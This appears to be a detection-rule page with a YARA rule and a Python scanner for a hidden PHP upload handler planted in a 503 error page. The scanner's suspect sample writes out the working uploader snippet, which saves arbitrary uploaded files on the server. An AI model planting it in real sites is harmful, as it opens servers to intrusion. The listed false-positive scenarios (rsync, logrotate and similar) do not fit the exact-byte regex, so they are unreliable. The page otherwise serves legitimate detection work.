Adversaries may use a 503 Service Unavailable response to obfuscate the upload of hidden files, potentially exfiltrating data or establishing persistence. SOC teams should proactively hunt for this behavior in Azure Sentinel to identify covert data-transfer methods that evade standard detection mechanisms.
YARA Rule

```yara
rule hidden_file_upload_in_503 {
    strings:
        $ = /error_reporting\(0\);\$f=\$_FILES\[\w+\];copy\(\$f\[tmp_name\],\$f\[name\]\);error_reporting\(E_ALL\);/
    condition:
        any of them
}
```
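As an added example (not part of the original rule page), the same pattern applied with Python's re module so it can be run over a directory of web content without the yara binary; the two 503 pages below are constructed samples, one plain and one embedding the snippet with an arbitrary $_FILES index name, which the \w+ in the pattern also covers.

```python
import re
import sys
from pathlib import Path

# Same pattern as the YARA rule above, as a bytes regex (file contents are read raw).
HIDDEN_UPLOAD_RE = re.compile(
    rb"error_reporting\(0\);\$f=\$_FILES\[\w+\];"
    rb"copy\(\$f\[tmp_name\],\$f\[name\]\);error_reporting\(E_ALL\);"
)

def scan_bytes(data: bytes) -> list[str]:
    """Return every matched snippet in data (empty list when the content is clean)."""
    return [m.group(0).decode("ascii", "replace") for m in HIDDEN_UPLOAD_RE.finditer(data)]

def scan_tree(root: Path, suffixes=(".php", ".html", ".htm", ".inc")) -> dict[str, list[str]]:
    """Scan all files under root with web-content suffixes; map hit paths to their matches."""
    hits = {}
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            found = scan_bytes(path.read_bytes())
            if found:
                hits[str(path)] = found
    return hits

# Constructed sample: an ordinary 503 error page with no embedded code.
BENIGN_503 = (
    b"<html><head><title>503 Service Unavailable</title></head>\n"
    b"<body><h1>Service Unavailable</h1>"
    b"<p>The server is temporarily unable to handle the request.</p></body></html>\n"
)

# Constructed sample: the same page with the upload handler hidden after the 503 markup.
SUSPECT_503 = (
    b"<?php header('HTTP/1.1 503 Service Unavailable'); ?>\n"
    b"<html><body><h1>Service Unavailable</h1></body></html>\n"
    b"<?php error_reporting(0);$f=$_FILES[upload];"
    b"copy($f[tmp_name],$f[name]);error_reporting(E_ALL); ?>\n"
)

if __name__ == "__main__":
    # With no arguments, show the result on the two constructed samples.
    if len(sys.argv) == 1:
        print("benign :", scan_bytes(BENIGN_503))
        print("suspect:", scan_bytes(SUSPECT_503))
    else:
        for p, found in scan_tree(Path(sys.argv[1])).items():
            print(p, found)
```

The regex is an exact byte sequence, so any reformatting of the snippet falls outside it; treat a hit as high-confidence and a miss as no evidence either way.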
This YARA rule can be deployed in the following contexts:
This rule contains one string pattern in its detection logic.
Scenario: System backup using rsync
Description: A scheduled backup job using rsync uploads a hidden file as part of a full system backup.
Filter/Exclusion: Exclude files with the .backup extension or files uploaded by the rsync process with a known backup timestamp.

Scenario: Admin task to clean up temporary files
Description: An administrator manually deletes or moves temporary files, some of which are hidden, using a script or a command-line tool like rm or find.
Filter/Exclusion: Exclude files with the .tmp or .log extensions, or files modified by the root user within a known maintenance window.

Scenario: Log rotation using logrotate
Description: The logrotate utility rotates and compresses log files, which may include hidden files or temporary files during the rotation process.
Filter/Exclusion: Exclude files with the .gz or .tar.gz extensions, or files modified by the logrotate service.

Scenario: Configuration management tool deployment
Description: A configuration management tool like Ansible or Puppet uploads hidden configuration files during a deployment; these are legitimate system files.
Filter/Exclusion: Exclude files with the .cfg or .conf extensions, or files uploaded by the Ansible or Puppet agent with a known deployment timestamp.

Scenario: User-generated hidden files for personal use
Description: A user creates hidden files (e.g., .secret or .notes) for personal data storage, which may be flagged by the rule.
Filter/Exclusion: Exclude files owned by regular users with the .hidden or .personal extension, or files created in a user-specific directory like ~/.local/.